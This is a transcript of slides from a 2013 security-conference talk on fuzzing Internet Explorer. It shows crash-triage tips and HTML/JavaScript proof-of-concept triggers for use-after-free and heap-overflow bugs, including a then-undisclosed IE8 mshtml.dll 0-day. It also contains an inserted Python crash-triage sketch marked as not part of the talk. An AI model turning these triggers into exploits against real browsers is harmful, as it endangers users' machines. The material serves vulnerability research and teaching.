
A Casual Talk on 0-Days - Happy Fuzzing Internet Explorer

Orange
July 19, 2013


Where do 0-days come from?
Fuzzing, as a way of finding vulnerabilities, lets 0-days roll in even while you are lying down.

This is a relaxed talk,
sharing some fuzzer design, lessons learned from fuzzing, and directions for fuzzing Internet Explorer.

Finally, a previously undisclosed 0-day is revealed for this HITCON.


Transcript

  1. About Me
    • 蔡政達 aka Orange
    • 2009 champion, HITCON (Taiwan hacker conference) competition
    • 2011, 2012 champion, National Information Security Competition (Golden Shield Award)
    • 2011 speaker, AVTOKYO (Tokyo)
    • 2012 speaker, VXRLConf (Hong Kong)
    • Speaker at Taiwan PHPConf, WebConf, PyConf
    • Specializes in
      – Hacking techniques
      – Web Security
      – Windows Vulnerability Exploitation
  2. But today let's talk about 0-Day and Fuzzing (not my area of expertise QQ)
    But Today Let's Talk About 0-Day and Fuzzing (I Am Not an Expert in This, Just Sharing)
  3. Debug a Process
    >>> from pydbg import pydbg   # the pydbg class lives inside the pydbg module
    >>> dbg = pydbg()
    >>> dbg.load( file )          # or dbg.attach( pid ); file / pid are placeholders
    >>> dbg.run()
  4. Logger (Filter)
    • Mountains and valleys of crashes
    • Not every crash can become an exploit
    • Over 90% are null-pointer dereferences, usable only for DoS
      – mov eax, [ebx+0x70]
      – ; ebx = 0
    • EIP
    • Disassemble
      – jmp reg
      – call reg
      – call [reg + CONST]
    • Stack
    • SEH Chain
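As an added example (not code from Orange's talk or fuzzer), here is a Python sketch of the logger filter this slide describes: it parses a WinDbg-style register dump in the layout shown on slide 14 and buckets the crash into the categories the slide lists, so null-pointer DoS noise can be dropped before a human looks at it. The sample dumps are constructed, and the 0x1000 near-null bound is an assumption.

```python
import re

# GPRs: EIP equal to one of these is the slide's "EIP" signal (esp/ebp excluded).
GPRS = ("eax", "ebx", "ecx", "edx", "esi", "edi")
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[sb]p|eip)=([0-9a-f]{8})")
# Memory operand such as [ebx+70h] or [ecx]; group 1 is the base register.
MEM_RE = re.compile(r"\[(e[abcd]x|e[sd]i|e[sb]p)(?:[+-][0-9a-fA-Fh]+)?\]")

# Constructed dumps in the WinDbg layout of slide 14; values are invented, not a real crash.
SAMPLE_CRASHES = {
    "null_read": (
        "eax=00000000 ebx=00000000 ecx=037f12c8 edx=6a1f0000 esi=0172b130 edi=00000000\n"
        "eip=6a1f3c10 esp=0172b100 ebp=0172b11c\n"
        "6a1f3c10 8b4370          mov     eax,dword ptr [ebx+70h]"),
    "call_reg": (
        "eax=3dbf00a4 ebx=0019bb30 ecx=037f12c8 edx=085d8b53 esi=0172b130 edi=00000000\n"
        "eip=085d8b53 esp=0172b100 ebp=0172b11c\n"
        "085d8b53 ??              ???"),
    "vtable_call": (
        "eax=3dbf00a4 ebx=0019bb30 ecx=037f12c8 edx=00000001 esi=0172b130 edi=00000000\n"
        "eip=6a1f3c20 esp=0172b100 ebp=0172b11c\n"
        "6a1f3c20 ff5170          call    dword ptr [ecx+70h]"),
}

def parse_dump(text):
    """Return (register dict, faulting-instruction line) for one crash dump."""
    regs = {name: int(val, 16) for name, val in REG_RE.findall(text)}
    return regs, text.strip().splitlines()[-1]

def triage(text):
    """Bucket a crash roughly as the slide's logger filter does.
    'eip-controlled'  EIP equals a GPR or sits in unmapped memory ('?? ???')
    'null-deref'      memory operand base register is near zero: DoS only
    'indirect-branch' faulting instruction is jmp/call via reg or [reg+CONST]
    'unknown'         everything else, left for manual review
    """
    regs, instr = parse_dump(text)
    eip = regs.get("eip")
    if "???" in instr or any(regs.get(r) == eip for r in GPRS):
        return "eip-controlled"
    mem = MEM_RE.search(instr)
    if mem and regs.get(mem.group(1), 0xFFFFFFFF) < 0x1000:  # assumed near-null bound
        return "null-deref"
    mnemonic, operand = (instr.split()[2:4] + ["", ""])[:2]
    if mnemonic in ("jmp", "call") and (operand in GPRS or mem):
        return "indirect-branch"
    return "unknown"

def triage_all(crashes):  # name -> bucket, so null-deref noise can be filtered out
    return {name: triage(dump) for name, dump in crashes.items()}
```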
  5. Read the spec. Read the spec. Read the spec. (repeated to fill the whole slide)
  6. Known Vulnerability Patterns
    • From studying past vulnerabilities we know
    • Internet Explorer is Not Good at
      – Parsing DOM Tree
      – Parsing <TABLE> with <TR> & <TD>
      – Parsing <TABLE> with <COL>
    • CTreeNode & CTableLayout
  7. Pseudo Scenario of Use-After-Free
    <foo>
    <bla id=x>
    <bar id=y>
    ……
    </bar>
    </bla>
    </foo>

    <script>
    var x = document.getElementById( 'x' );
    var y = document.getElementById( 'y' );
    x.innerHTML = 'AAAA…';   // replacing x's subtree frees the node y referred to
    y.length = '100px';      // pseudo: touching y again triggers layout on the freed node
    </script>
  8. Ex: CVE-2011-1260 (Not Full Version)
    <body>
    <script>
    document.body.innerHTML += "<object …>TAG_1</object>";
    document.body.innerHTML += "<a id='tag_3' style='…'>TAG_3</a>";
    document.body.innerHTML += "AAAAAAA";
    document.body.innerHTML += "<strong style='…'>TAG_11</strong>";
    </script>
    </body>
  9. Ex: CVE-2012-1876 (Heap Overflow)
    <script> setTimeout("trigger();",1); </script>
    <TABLE style="table-layout: fixed; ">
    <col id="132" width="41" span="1" > </col>
    </col>
    </TABLE>

    function trigger() {
        var obj_col = document.getElementById("132");
        obj_col.width = "42765";
        obj_col.span = 1000;
    }
  10. Fuzzing with DOM Tree (https://www.facebook.com/zztao)
    • Using DOM Methods to Manipulate Objects
      – createElement
      – removeChild / appendChild
      – innerHTML / outerText
      – createRange
      – addEventListener
      – select
      – …
  11. Putting It All Together
    1) Randomize HTML nodes for the initial document
    2) Manipulate the nodes with DOM methods (can also play with CSS at the same time)
  12. Generally, a Single-Machine Run Can Find 1 or 2 IE 0-Days in a Month
    I have successfully found 0-days from IE6 to IE9. For IE10+ I haven't tried, because I am too lazy :(
  13. So I Found a 0-Day for HITCON
    1) Works on Internet Explorer 8
    2) mshtml.dll 8.0.6001.23501
  14. call edx
    (e10.950): Access violation - code c0000005 (!!! second chance !!!)
    eax=3dbf00a4 ebx=0019bb30 ecx=037f12c8 edx=085d8b53 esi=0172b130 edi=00000000
    eip=085d8b53 esp=0172b100 ebp=0172b11c iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    085d8b53 ??              ???
  15. Writing Exploit
    • Windows Protection
      – DEP
      – Luckily, if it is Windows XP we don't care about ASLR
      – Luckily, it is not IE10+, so there is no vTable Guard
  16. Proof-of-Concept
    <!DOCTYPE html>
    <table>
    <tr><legend><span >
    <q id='e'>
    <a align="center"> <th> O </th> </a>
    </q>
    </span></legend></tr>
    </table>
    </html>

    window.onload = function(){
        var x = document.getElementById('e');
        x.outerText = '';
    }
  17. Works on
    • mshtml.dll ……             # ……
    • mshtml.dll …...            # 2013 / 05 / 14
    • mshtml.dll 8.0.6001.23501  # 2013 / 06 / 11
    • mshtml.dll 8.0.6001.23507  # 2013 / 07 / 09